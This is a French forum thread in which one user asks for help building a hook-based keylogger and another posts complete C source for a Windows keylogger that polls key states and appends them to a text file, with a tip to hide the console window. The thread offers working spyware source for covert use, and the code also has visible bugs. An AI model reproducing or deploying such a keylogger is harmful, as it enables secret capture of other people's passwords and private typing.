Keylogger

soniablackcrow Messages postés 3 Date d'inscription lundi 8 janvier 2007 Statut Membre Dernière intervention 26 juin 2007 - 27 mars 2007 à 11:11
cs_kiitos Messages postés 34 Date d'inscription vendredi 10 mars 2006 Statut Membre Dernière intervention 14 septembre 2008 - 6 oct. 2008 à 21:09
slt :)
j ai navigué sur ce site a la recherche d'un bon keylogger , j en ai trouvé pas mal mais j ai juste un probleme autour de l exécution de ces keyloggers....c est a  dire que le keylogger fonctionne tres bien (de point de vue exécutable) mais de point de vue code de source rien ne va plus j arrive meme pas a generer la DLL (surtout pour la methode des hooks car j en ai besoin)... est ce que qq1 pourra m aider la dessus... merci

3 réponses

cs_kiitos Messages postés 34 Date d'inscription vendredi 10 mars 2006 Statut Membre Dernière intervention 14 septembre 2008
5 sept. 2008 à 20:20
Même si c'est un peu tard, je veux quand même bien essayer de t'envoyer mon keylogger personnel, il ne te restera plus qu'à le compiler toi même, mon e-mail c'est kiitos1989@yahoo.fr.
0
cs_kiitos Messages postés 34 Date d'inscription vendredi 10 mars 2006 Statut Membre Dernière intervention 14 septembre 2008
6 oct. 2008 à 21:06
#include <stdio.h>
#include <windows.h>
#include <winuser.h>

void keys(int key)
{
    FILE *key_file;
    key_file = fopen("key.txt","a+");
    if(key==8)
    {
        fprintf(key_file,"[del]");
    }
    if(key==13)
    {
        fprintf(key_file,"\n");
    }
    if(key==32)
    {
        fprintf(key_file," ");
    }
    if(key==VK_CAPITAL)
    {
        fprintf(key_file,"[Caps]");
    }
    if(key==VK_TAB)
    {
        fprintf(key_file,"[TAB]");
    }
    if(key ==VK_SHIFT)
    {
        fprintf(key_file,"[SHIFT]");
    }
    if(key ==VK_CONTROL)
    {
        fprintf(key_file,"[CTRL]");
    }
    if(key ==VK_PAUSE)
    {
        fprintf(key_file,"[PAUSE]");
    }
    if(key ==VK_KANA)
    {
        fprintf(key_file,"[Kana]");
    }
    if(key ==VK_ESCAPE)
    {
        fprintf(key_file,"[ESC]");
    }
    if(key ==VK_END)
    {
        fprintf(key_file,"[END]");
    }
    if(key==VK_HOME)
    {
        fprintf(key_file,"[HOME]");
    }
    if(key ==VK_LEFT)
    {
        fprintf(key_file,"[LEFT]");
    }
    if(key ==VK_UP)
    {
        fprintf(key_file,"[UP]");
    }
    if(key ==VK_RIGHT)
    {
        fprintf(key_file,"[RIGHT]");
    }
    if(key ==VK_DOWN)
    {
        fprintf(key_file,"[DOWN]");
    }
    if(key ==VK_SNAPSHOT)
    {
        fprintf(key_file,"[PRINT]");
    }
    if(key ==VK_NUMLOCK)
    {
        fprintf(key_file,"[NUM LOCK]");
    }
    if(key ==VK_INSERT)
    {
        fprintf(key_file,"[INSERT]");
    }
    if(key ==VK_DELETE)
    {
        fprintf(key_file,"[DELETE]");
    }
    if(key ==VK_DIVIDE)
    {
        fprintf(key_file,"/");
    }
    if(key ==VK_SUBTRACT)
    {
        fprintf(key_file,"-");
    }
    if(key ==VK_MULTIPLY)
    {
        fprintf(key_file,"*");
    }
    if(key ==VK_ADD)
    {
        fprintf(key_file,"+");
    }
    if(key ==190 || key==110)
    {
        fprintf(key_file,".");
    }
    if(key >=96 && key <= 105)
    {
        key = key - 48;
        fprintf(key_file,"%s",&key);
    }
    if(key >=48 && key <= 59)
    {
        fprintf(key_file,"%s",&key);
    }
    if(key !=VK_LBUTTON || key !=VK_RBUTTON)
    {
        if(key >=65 && key <=90)
        {
            if(GetKeyState(VK_CAPITAL))
            {
                fprintf(key_file,"%s",&key);
            }
            else
            {
                key = key +32;
                fprintf(key_file,"%s",&key);
            }
        }
    }
    fclose(key_file);
}

int main(int argc, char *argv[])
{
    char id;
    for(id = 8; id <= 191; id++)
    {
        if(GetAsyncKeyState(id) == -32767)
        {
            keys(id);
        }
    }
}

C'est gratos, mais il faut l'optimiser, il ne marche que sous windows et il y a quelques problèmes car il peut tomber en panne. -mwindows pour enlever la console. Bref, fait en quand même bon usage.
0
cs_kiitos Messages postés 34 Date d'inscription vendredi 10 mars 2006 Statut Membre Dernière intervention 14 septembre 2008
6 oct. 2008 à 21:09
Sinon à propos de la compilation des dll, je peux te donner des astuces pour le faire normalement. Je peux te donner le fichier batch avec un exemple et toutes les commandes appropriées.
0
Rejoignez-nous